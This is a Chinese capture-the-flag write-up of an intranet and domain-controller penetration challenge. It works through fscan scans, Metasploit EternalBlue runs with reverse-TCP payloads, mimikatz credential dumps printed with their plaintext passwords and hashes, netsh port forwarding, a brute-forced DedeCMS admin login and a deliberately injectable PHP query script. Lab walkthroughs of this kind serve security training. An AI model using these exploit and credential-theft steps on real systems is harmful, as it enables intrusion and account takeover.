某年信息安全铁人三项赛域控内网渗透测试题目,题目包含三个靶机及多个flag。提交最终域控上的flag提交即可完成此题。 题目所在网段:172.25.0.0/24
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.25.0.1 is alive
(icmp) Target 172.25.0.123 is alive
(icmp) Target 172.25.0.141 is alive
[*] Icmp alive hosts len is: 3
172.25.0.141:135 open
172.25.0.141:139 open
172.25.0.1:22 open
172.25.0.141:445 open
172.25.0.123:80 open
172.25.0.123:22 open
[*] alive ports len is: 6
start vulscan
[*] NetInfo:
[*]172.25.0.141
[->]TOPSEC
[->]172.25.0.141
[->]192.168.60.130
[+] 172.25.0.141 MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)
直接用msf打MS17-010
msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 172.25.0.141
RHOSTS => 172.25.0.141
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.44.128:4444
[*] 172.25.0.141:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.25.0.141:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x86 (32-bit)
[*] 172.25.0.141:445 - Scanned 1 of 1 hosts (100% complete)
[+] 172.25.0.141:445 - The target is vulnerable.
[-] 172.25.0.141:445 - Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets
[*] Exploit completed, but no session was created.
发现打不成,说此模块仅支持 x64(64 位)目标,也就是可能目标靶机不是x64
先用use auxiliary/scanner/smb/smb_ms17_010再探测一下
msf6 auxiliary(scanner/smb/smb_ms17_010) > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework yes List of named pipes to check
/data/wordlists/named_pipes.txt
RHOSTS yes The target host(s), see https://github.com/rapid7/metas
ploit-framework/wiki/Using-Metasploit
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 172.25.0.141
RHOSTS => 172.25.0.141
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 172.25.0.141:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x86 (32-bit)
[*] 172.25.0.141:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
确实存在MS17-010,但是机器是32位的,MSF利用不了
解决办法就是给kali装兼容32架构
遇到软件冲突不兼容就把不兼容的remove了,再install就行【提前打好快照,万一翻车了还能返回】
sudo dpkg --add-architecture i386 #这是让Linux安装32位架构,好兼容32位的程序
apt-get update --fix-missing
sudo apt-get upgrade
apt-get install wine32
wine cmd.exe #测试是否安装成功、
#下载32位操作系统所用的脚本
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
mv Eternalblue-Doublepulsar-Metasploit/deps /usr/share/metasploit-framework/modules/exploits/windows/smb/
mv Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
reload_all
exp的options的一些设置
use exploit/windows/smb/eternalblue_doublepulsar
set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set PROCESSINJECT lsass.exe
set TARGETARCHITECTURE x64
设置完这些就可以打了,能不能成就看命了,显然我命不好,还是打不成
msf6 exploit(windows/smb/eternalblue_doublepulsar) > set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
ETERNALBLUEPATH => /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
msf6 exploit(windows/smb/eternalblue_doublepulsar) > set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
DOUBLEPULSARPATH => /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
msf6 exploit(windows/smb/eternalblue_doublepulsar) > set TARGETARCHITECTURE x64
TARGETARCHITECTURE => x64
msf6 exploit(windows/smb/eternalblue_doublepulsar) > options
Module options (exploit/windows/smb/eternalblue_doublepulsar):
Name Current Setting Required Description
---- --------------- -------- -----------
DOUBLEPULSARPATH /usr/share/metasploit-framewo yes Path directory of Doublepulsar
rk/modules/exploits/windows/s
mb/deps
ETERNALBLUEPATH /usr/share/metasploit-framewo yes Path directory of Eternalblue
rk/modules/exploits/windows/s
mb/deps
PROCESSINJECT lsass.exe yes Name of process to inject into (Change to lsass.ex
e for x64)
RHOSTS yes The target host(s), see https://github.com/rapid7/
metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The SMB service port (TCP)
TARGETARCHITECTURE x64 yes Target Architecture (Accepted: x86, x64)
WINEPATH /root/.wine/drive_c/ yes WINE drive_c path
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.44.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
8 Windows 7 (all services pack) (x86) (x64)
msf6 exploit(windows/smb/eternalblue_doublepulsar) > set RHOSTS 172.25.0.141
RHOSTS => 172.25.0.141
msf6 exploit(windows/smb/eternalblue_doublepulsar) > run
[*] Started reverse TCP handler on 192.168.44.128:4444
[*] 172.25.0.141:445 - Generating Eternalblue XML data
[*] 172.25.0.141:445 - Generating Doublepulsar XML data
[*] 172.25.0.141:445 - Generating payload DLL for Doublepulsar
[*] 172.25.0.141:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 172.25.0.141:445 - Launching Eternalblue...
发现开着3389,利用在172.25.0.123数据库里找到的密码尝试连接远程桌面
msf连到win的shell中文乱码解决办法:chcp 65001
rdesktop 172.25.0.141
得到flag4:flag4{238fb735876083b832229d279b995062}
根据ipconfig /all可以发现是存在一个test.com的域,同时还有个网段192.168.60.1/24
C:\Users\Administrator.ZGC-20160413JJL>ipconfig /all
Windows IP 配置
主机名 . . . . . . . . . . . . . : TOPSEC
主 DNS 后缀 . . . . . . . . . . . : test.com
节点类型 . . . . . . . . . . . . : 混合
IP 路由已启用 . . . . . . . . . . : 否
WINS 代理已启用 . . . . . . . . . : 否
DNS 后缀搜索列表 . . . . . . . . : test.com
以太网适配器 本地连接 3:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
3
物理地址. . . . . . . . . . . . . : 00-0C-29-1B-BB-5D
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . : fe80::44bb:4c57:67ee:dfe1%15(首选)
IPv4 地址 . . . . . . . . . . . . : 172.25.0.141(首选)
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 172.25.0.1
DHCPv6 IAID . . . . . . . . . . . : 318770217
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-1E-9F-8D-83-00-0C-29-E1-58-E
DNS 服务器 . . . . . . . . . . . : fec0:0:0:ffff::1%1
fec0:0:0:ffff::2%1
fec0:0:0:ffff::3%1
TCPIP 上的 NetBIOS . . . . . . . : 已启用
以太网适配器 本地连接 2:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
2
物理地址. . . . . . . . . . . . . : 00-0C-29-1B-BB-67
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . : fe80::15cd:1f39:3350:fab5%13(首选)
IPv4 地址 . . . . . . . . . . . . : 192.168.60.130(首选)
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 192.168.60.100
DHCPv6 IAID . . . . . . . . . . . : 318770217
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-1E-9F-8D-83-00-0C-29-E1-58-E
DNS 服务器 . . . . . . . . . . . : 192.168.60.100
TCPIP 上的 NetBIOS . . . . . . . : 已启用
隧道适配器 isatap.{CCCC532D-B874-4D57-9B81-CDB995240117}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
隧道适配器 本地连接*:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft Teredo Tunneling Adapter
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
隧道适配器 isatap.{08324E80-4703-43E4-9880-ACCC4E595A04}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #3
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
上传个fscan扫一下【需要是32位的】
fscan32.exe -h 192.168.60.1/24
192.168.60.130:135 open
192.168.60.100:135 open
192.168.60.100:88 open
192.168.60.130:445 open
192.168.60.100:445 open
192.168.60.130:139 open
192.168.60.100:139 open
[+] MS17-010 192.168.60.130 (Windows 7 Ultimate 7601 Service Pack 1)
[*] NetInfo
[*]192.168.60.130
[->]TOPSEC
[->]172.25.0.141
[->]192.168.60.130
[*] NetInfo
[*]192.168.60.100
[->]WIN-JDS94C5QEQQ
[->]192.168.60.100
[+] MS17-010 192.168.60.100 (Windows Server 2008 R2 Standard 7601 Service Pack 1)
[*] NetBios 192.168.60.100 [+] DC:WIN-JDS94C5QEQQ.test.com Windows Server 2008 R2 Standard 7601 Service Pack 1
可见192.168.60.100是域控IP,同时发现也存在永恒之蓝,现在就是俩思路了,一个是正常域控思路,一个就是利用搭建代理打永恒之蓝
先说正常域控思路,先用mimikatz导出用户凭据
log
privilege::debug //用于提升至DebugPrivilege权限
sekurlsa::logonpasswords full //用于导出用户凭据
导出内容如下
Using 'mimikatz.log' for logfile : OK
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords full
Authentication Id : 0 ; 550594 (00000000:000866c2)
Session : RemoteInteractive from 3
User Name : administrator
Domain : TEST
Logon Server : WIN-JDS94C5QEQQ
Logon Time : 2023/4/16 21:15:25
SID : S-1-5-21-3162112726-21061240-2166559086-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : TEST
* LM : 3264d00d3f2d8530fb62879e33fbb745
* NTLM : 9d5161ebc56e27949f872f96cdb95490
* SHA1 : 76403c35658baf605b4d10ee4d015d1fcaef59da
tspkg :
* Username : Administrator
* Domain : TEST
* Password : TopSec_2017
wdigest :
* Username : Administrator
* Domain : TEST
* Password : TopSec_2017
kerberos :
* Username : administrator
* Domain : TEST.COM
* Password : TopSec_2017
ssp :
credman :
Authentication Id : 0 ; 365921 (00000000:00059561)
Session : RemoteInteractive from 2
User Name : Administrator
Domain : TOPSEC
Logon Server : TOPSEC
Logon Time : 2023/4/16 21:05:36
SID : S-1-5-21-3220505158-1983987487-2792417607-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : TOPSEC
* LM : 7dafe6af0d82ef56ccf9155e3e7db453
* NTLM : f013ff76154a124f8cfc32f654582420
* SHA1 : 8f2e87185cbe8a3e3aed2f409f5017d9e12036c1
tspkg :
* Username : Administrator
* Domain : TOPSEC
* Password : topsec.123
wdigest :
* Username : Administrator
* Domain : TOPSEC
* Password : topsec.123
kerberos :
* Username : Administrator
* Domain : TOPSEC
* Password : topsec.123
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/4/16 21:04:33
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : TOPSEC$
Domain : TEST
Logon Server : (null)
Logon Time : 2023/4/16 21:04:33
SID : S-1-5-20
msv :
[00000003] Primary
* Username : TOPSEC$
* Domain : TEST
* NTLM : ec572542a28c795e4e43654a0f307db6
* SHA1 : ae24e2864124ad6dcb67e04ea742fc89c5fd6217
tspkg :
wdigest :
* Username : TOPSEC$
* Domain : TEST
* Password : atl$<'q+Vn_?i qEGh/q^k$NIE1C]@&WCmHcYjMH/t9#6Sx'o.hb^r:w]uquI^UI'_U#7Z)FZN8:mGy_X&HK8^7W*[Mi]rs$-/67&/t9LXRfp!1usS4+^I&
kerberos :
* Username : topsec$
* Domain : TEST.COM
* Password : atl$<'q+Vn_?i qEGh/q^k$NIE1C]@&WCmHcYjMH/t9#6Sx'o.hb^r:w]uquI^UI'_U#7Z)FZN8:mGy_X&HK8^7W*[Mi]rs$-/67&/t9LXRfp!1usS4+^I&
ssp :
credman :
Authentication Id : 0 ; 50816 (00000000:0000c680)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2023/4/16 21:04:32
SID :
msv :
[00000003] Primary
* Username : TOPSEC$
* Domain : TEST
* NTLM : ec572542a28c795e4e43654a0f307db6
* SHA1 : ae24e2864124ad6dcb67e04ea742fc89c5fd6217
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : TOPSEC$
Domain : TEST
Logon Server : (null)
Logon Time : 2023/4/16 21:04:32
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : TOPSEC$
* Domain : TEST
* Password : atl$<'q+Vn_?i qEGh/q^k$NIE1C]@&WCmHcYjMH/t9#6Sx'o.hb^r:w]uquI^UI'_U#7Z)FZN8:mGy_X&HK8^7W*[Mi]rs$-/67&/t9LXRfp!1usS4+^I&
kerberos :
* Username : topsec$
* Domain : TEST.COM
* Password : atl$<'q+Vn_?i qEGh/q^k$NIE1C]@&WCmHcYjMH/t9#6Sx'o.hb^r:w]uquI^UI'_U#7Z)FZN8:mGy_X&HK8^7W*[Mi]rs$-/67&/t9LXRfp!1usS4+^I&
ssp :
credman :
mimikatz #
找到了一个test域的administrator用户和密码,再远程桌面连接域控机器
administrator/TopSec_2017
得到flag5:flag5{6aa16f9b07f2d00b16b94aa797488b38}
第二种搭建代理打永恒之蓝,可以直接用端口转发即可,也可以frp也行,但是要知道这是32位机器,和平常还是有所不同的
windows端口转发payload
netsh interface portproxy add v4tov4 listenaddress=192.168.60.100 listenport=445 connectaddress=10.8.0.34 connectport=885
查看全部转发规则
netsh interface portproxy show all
删除指定转发规则
netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=445
来看一下172.25.0.123的80吧,是个dedecms【DedeCMSV57_UTF8_SP1】
后台dede/跳转,直接爆破admin密码
admin/1q2w3e4r
得到flag1:flag1{5d41402abc4b2a76b9719d11017c592}
上传文件RCE
找到数据库连接文件
/var/www/html/sql/index.php
<?php
error_reporting(0);
function getsql($str){
$str=str_replace('select','',$str);
$str=str_replace('join','',$str);
$str=str_replace('union','',$str);
$str=str_replace('where ','',$str);
$str=str_replace('insert','',$str);
$str=str_replace('delete','',$str);
$str=str_replace('and ','',$str);
$str=str_replace('drop','',$str);
$str=str_replace('create','',$str);
$str=str_replace('script','',$str);
$str=str_replace('alert','',$str);
$str=str_replace('<',''',$str);
return $str;
}
$db_host = 'localhost';
$db_user = 'root';
$db_pass = 'root';
$id = trim(getsql($_REQUEST['id']));
if (empty($id)){
$id=1;
}
$link = mysql_connect($db_host, $db_user, $db_pass) or die("DB Connect Error:" . mysql_error());
mysql_select_db('dedecmsv57utf8sp1', $link) or die("Can\'t use dedecmsv57utf8sp1" . mysql_error());
$sql = "SELECT * FROM topsec_admin WHERE id=$id";
//echo $sql;
$query = mysql_query($sql) or die("Invalid Query:" . mysql_error());
while ($row = mysql_fetch_array($query))
{
echo "用户ID:" . $row['id'] . "<br>";
echo "用户账号:" . $row['userid'] . "<br>";
//$pass=;
echo "用户密码:" . substr_replace(substr($row['pwd'],-12,4),"****",-3,2) . "<br>";
}
mysql_close($link);
echo "当前查询语句:".htmlentities($sql, ENT_QUOTES)."<br>";
?>
连接数据库
找到flag2:flag2{912ec803b2ce49e4a541068d495ab570}
/var/www/html下得到flag3:flag3{fd5d4d5a199e9e8bfadead5f5e52895a}
同时在数据库找到了两个用户密码,这里的administrator不难联想到很像win机器的用户,这里的确在MS17-010机器上用到了也的确是该用户的密码
administrator/topsec.123
admin/1q2w3e4r
这里查看172.25.0.123机器网卡发现和另外一个机器【MS17-010】是不通的